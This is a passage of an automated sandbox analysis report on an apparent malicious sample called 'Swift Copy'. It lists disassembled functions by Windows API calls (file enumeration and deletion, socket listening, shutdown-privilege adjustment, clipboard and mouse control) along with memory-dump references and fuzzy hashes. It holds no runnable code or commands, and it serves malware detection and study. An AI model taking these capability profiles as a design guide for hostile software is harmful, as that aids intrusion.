                                              • FindClose.KERNEL32(00000000), ref: 00DE9824
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00DE9840
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE9890
                                              • SetCurrentDirectoryW.KERNEL32(00E36B7C), ref: 00DE98AE
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE98B8
                                              • FindClose.KERNEL32(00000000), ref: 00DE98C5
                                              • FindClose.KERNEL32(00000000), ref: 00DE98D5
                                                • Part of subcall function 00DDDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DDDB00
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                              • String ID: *.*
                                              • API String ID: 2640511053-438819550
                                              • Opcode ID: b504536c980388409abc5be8718821ecc7fff1ed0ee746a7ce3ae92d96ea31ba
                                              • Instruction ID: 2097a5405863b4064775b349adee254c4454e328fe07e6868b2ded8d0ca26237
                                              • Opcode Fuzzy Hash: b504536c980388409abc5be8718821ecc7fff1ed0ee746a7ce3ae92d96ea31ba
                                              • Instruction Fuzzy Hash: 5231C2315016596EDF10BFB6EC98ADEB7ACDF06320F244166E810B21E0DB31D989CA74
                                              APIs
                                              • GetLocalTime.KERNEL32(?), ref: 00DE8257
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DE8267
                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DE8273
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DE8310
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8324
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8356
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DE838C
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8395
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CurrentDirectoryTime$File$Local$System
                                              • String ID: *.*
                                              • API String ID: 1464919966-438819550
                                              • Opcode ID: 2c0b7582c6cf1f3dd08868f862b20d5a58b12e712cbf47dfb2be8cf56fb33add
                                              • Instruction ID: 3c313774d58bc1320b70f2884161a38b3c90e0656775c62bc98532e138021b3d
                                              • Opcode Fuzzy Hash: 2c0b7582c6cf1f3dd08868f862b20d5a58b12e712cbf47dfb2be8cf56fb33add
                                              • Instruction Fuzzy Hash: CE6155725083459FCB10EF65C8419AEB3E8FF89314F04891EE999D7251EB31E949CBA2
                                              APIs
                                                • Part of subcall function 00D73AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D73A97,?,?,00D72E7F,?,?,?,00000000), ref: 00D73AC2
                                                • Part of subcall function 00DDE199: GetFileAttributesW.KERNEL32(?,00DDCF95), ref: 00DDE19A
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DDD122
                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00DDD1DD
                                              • MoveFileW.KERNEL32(?,?), ref: 00DDD1F0
                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DDD20D
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DDD237
                                                • Part of subcall function 00DDD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00DDD21C,?,?), ref: 00DDD2B2
                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 00DDD253
                                              • FindClose.KERNEL32(00000000), ref: 00DDD264
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 1946585618-1173974218
                                              • Opcode ID: 0fbf6757a352c22f06e511ade6302fff72c63c69a5f28cade3a7cd192b06a95f
                                              • Instruction ID: 3c78ce42b50ebe1da178e2c4f7e1721f9100c74ab212ab45fc85eb5f7c4c4699
                                              • Opcode Fuzzy Hash: 0fbf6757a352c22f06e511ade6302fff72c63c69a5f28cade3a7cd192b06a95f
                                              • Instruction Fuzzy Hash: B9614B3180121DAECF05EBE0D9929EDBB76EF55300F248166E40677292EB31AF09DB71
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                              • String ID:
                                              • API String ID: 1737998785-0
                                              • Opcode ID: 9102f14aa7e575b9d8f7168f90bd3d7e377a9e23334a4f2d528456dc86fdebd5
                                              • Instruction ID: b1c1d117a8f5bf4d73e2c9af947963b89748ee95fccfa46274a0c1e22dc04ed0
                                              • Opcode Fuzzy Hash: 9102f14aa7e575b9d8f7168f90bd3d7e377a9e23334a4f2d528456dc86fdebd5
                                              • Instruction Fuzzy Hash: CD41EF34604651AFD720EF16E888F19BBE0EF44718F18C199E4599B662C732EC86CBA0
                                              APIs
                                                • Part of subcall function 00DD16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD170D
                                                • Part of subcall function 00DD16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD173A
                                                • Part of subcall function 00DD16C3: GetLastError.KERNEL32 ref: 00DD174A
                                              • ExitWindowsEx.USER32(?,00000000), ref: 00DDE932
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                              • String ID: $ $@$SeShutdownPrivilege
                                              • API String ID: 2234035333-3163812486
                                              • Opcode ID: 47b0c40420166abd9a0ff79a503794c679e83f3eac62ee7a1c3b0568b2887a52
                                              • Instruction ID: 78915c3da431b9268667ca5fc60f145fb4ca2b775c3684e87e1272bf05ded46f
                                              • Opcode Fuzzy Hash: 47b0c40420166abd9a0ff79a503794c679e83f3eac62ee7a1c3b0568b2887a52
                                              • Instruction Fuzzy Hash: E0012672611211BFEB1433B59C9AFBF735CD714740F280923F802F62D2D5A19C8489B0
                                              APIs
                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00DF1276
                                              • WSAGetLastError.WSOCK32 ref: 00DF1283
                                              • bind.WSOCK32(00000000,?,00000010), ref: 00DF12BA
                                              • WSAGetLastError.WSOCK32 ref: 00DF12C5
                                              • closesocket.WSOCK32(00000000), ref: 00DF12F4
                                              • listen.WSOCK32(00000000,00000005), ref: 00DF1303
                                              • WSAGetLastError.WSOCK32 ref: 00DF130D
                                              • closesocket.WSOCK32(00000000), ref: 00DF133C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorLast$closesocket$bindlistensocket
                                              • String ID:
                                              • API String ID: 540024437-0
                                              • Opcode ID: f7c3441b4ad2ce31ebe70f5a7fbbb18a88b2ef7d8b0796db5749afd33ec0e5fc
                                              • Instruction ID: dd257c6fc231feef2c7d69ee4f2ed5ed892f38a561bb8c489fb7035b40f98e85
                                              • Opcode Fuzzy Hash: f7c3441b4ad2ce31ebe70f5a7fbbb18a88b2ef7d8b0796db5749afd33ec0e5fc
                                              • Instruction Fuzzy Hash: 3941AE35A00144DFD714DF64C489B2ABBE5EF86318F29C188E95A9F292C771ED85CBB0
                                              APIs
                                                • Part of subcall function 00D73AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D73A97,?,?,00D72E7F,?,?,?,00000000), ref: 00D73AC2
                                                • Part of subcall function 00DDE199: GetFileAttributesW.KERNEL32(?,00DDCF95), ref: 00DDE19A
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DDD420
                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DDD470
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DDD481
                                              • FindClose.KERNEL32(00000000), ref: 00DDD498
                                              • FindClose.KERNEL32(00000000), ref: 00DDD4A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 2649000838-1173974218
                                              • Opcode ID: 105413e72c555cf8eccf03b9e076be5df2a0e7d23324c10209da321155891d7e
                                              • Instruction ID: 06c243f30ca9ab9932befa88c189a90a88dee0411b7790178e4a943b8ae6ca1a
                                              • Opcode Fuzzy Hash: 105413e72c555cf8eccf03b9e076be5df2a0e7d23324c10209da321155891d7e
                                              • Instruction Fuzzy Hash: 713170310083459FC714EF64D8528AFB7A8EE95304F548A1EF4D5522A1EB31EA09CB73
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: __floor_pentium4
                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                              • API String ID: 4168288129-2761157908
                                              • Opcode ID: 86631491d3ce86aa30e9c4ed53517f3466a88631219dfc106c3d5b29541f4740
                                              • Instruction ID: 71e80d074427870e7bbcbfb5ea9def6ec1caed80cadc7046ec7fb52ccef3e7c5
                                              • Opcode Fuzzy Hash: 86631491d3ce86aa30e9c4ed53517f3466a88631219dfc106c3d5b29541f4740
                                              • Instruction Fuzzy Hash: 46C22A71E046288FDB25CF68DD407EAB7B5EB4A305F1845EAD44DE7240E778AE818F60
                                              APIs
                                              • _wcslen.LIBCMT ref: 00DE64DC
                                              • CoInitialize.OLE32(00000000), ref: 00DE6639
                                              • CoCreateInstance.OLE32(00E0FCF8,00000000,00000001,00E0FB68,?), ref: 00DE6650
                                              • CoUninitialize.OLE32 ref: 00DE68D4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                              • String ID: .lnk
                                              • API String ID: 886957087-24824748
                                              • Opcode ID: 6cdd50375018e234192b4adc18d7a6c6400207a943e0bf0fc58b3f0f6756140b
                                              • Instruction ID: 7eef3dac980da1f2715c0de64a80353a0b90f7bc75321a3cf6f3bd3e67feec20
                                              • Opcode Fuzzy Hash: 6cdd50375018e234192b4adc18d7a6c6400207a943e0bf0fc58b3f0f6756140b
                                              • Instruction Fuzzy Hash: 7CD13871608241AFC314EF24C891D6BB7E8FF94344F14896DF5998B2A1EB30E945CBB2
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00DF22E8
                                                • Part of subcall function 00DEE4EC: GetWindowRect.USER32(?,?), ref: 00DEE504
                                              • GetDesktopWindow.USER32 ref: 00DF2312
                                              • GetWindowRect.USER32(00000000), ref: 00DF2319
                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00DF2355
                                              • GetCursorPos.USER32(?), ref: 00DF2381
                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DF23DF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                              • String ID:
                                              • API String ID: 2387181109-0
                                              • Opcode ID: 734572b83635766a3fcea9121b674b86cffd060d4f06540d68229d6f11256c01
                                              • Instruction ID: bfbfe41e3295681e7e1f2ddc060ad4b79247722ce244bd0c7b14b2be60fba547
                                              • Opcode Fuzzy Hash: 734572b83635766a3fcea9121b674b86cffd060d4f06540d68229d6f11256c01
                                              • Instruction Fuzzy Hash: 1F31EFB2105319AFC720DF15D844E6BBBE9FF84314F104A1EF984A7181DB35E948CBA2
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00DE9B78
                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DE9C8B
                                                • Part of subcall function 00DE3874: GetInputState.USER32 ref: 00DE38CB
                                                • Part of subcall function 00DE3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE3966
                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DE9BA8
                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DE9C75
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                              • String ID: *.*
                                              • API String ID: 1972594611-438819550
                                              • Opcode ID: 6c84736043166304164735a08c9fc4761fb3a9b8ff93334e7127b9c5d3d9bacc
                                              • Instruction ID: 0a4aa688f63ac67226b75a8ee8d72c3281d351122ce2083a954fec0dfdcf4ca4
                                              • Opcode Fuzzy Hash: 6c84736043166304164735a08c9fc4761fb3a9b8ff93334e7127b9c5d3d9bacc
                                              • Instruction Fuzzy Hash: EF41837190124AAFCF14FF65C895AEEBBB4EF05310F248156E405A2191EB319E84CF70
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 00D89A4E
                                              • GetSysColor.USER32(0000000F), ref: 00D89B23
                                              • SetBkColor.GDI32(?,00000000), ref: 00D89B36
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Color$LongProcWindow
                                              • String ID:
                                              • API String ID: 3131106179-0
                                              • Opcode ID: 0c7587da0b3f6b9193a8fd8bd79bcb163ce008142bac356e53fe3716bac515b3
                                              • Instruction ID: 84d7302c59ebeaa06452705b8496d2c685357980ec8b18526d0ce58f3c1a221b
                                              • Opcode Fuzzy Hash: 0c7587da0b3f6b9193a8fd8bd79bcb163ce008142bac356e53fe3716bac515b3
                                              • Instruction Fuzzy Hash: D2A1F870208405AEE72CBB2D8CA9F7B669DEB86350B1D020DF5C2E79D2CA25DD41CB71
                                              APIs
                                                • Part of subcall function 00DF304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DF307A
                                                • Part of subcall function 00DF304E: _wcslen.LIBCMT ref: 00DF309B
                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00DF185D
                                              • WSAGetLastError.WSOCK32 ref: 00DF1884
                                              • bind.WSOCK32(00000000,?,00000010), ref: 00DF18DB
                                              • WSAGetLastError.WSOCK32 ref: 00DF18E6
                                              • closesocket.WSOCK32(00000000), ref: 00DF1915
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 1601658205-0
                                              • Opcode ID: 9dc1cac27746414d86cd6c12a6a88969187470cd6efbf0528fdc4feb5b93f487
                                              • Instruction ID: 170a5b208432a648b1c9b7f292ba504b5375a78ef17af45844f37789f96fdb89
                                              • Opcode Fuzzy Hash: 9dc1cac27746414d86cd6c12a6a88969187470cd6efbf0528fdc4feb5b93f487
                                              • Instruction Fuzzy Hash: 1E51A175A00200AFD710AF24C886F2A77A5EB48718F18C55CFA196F283D671AD418BB1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
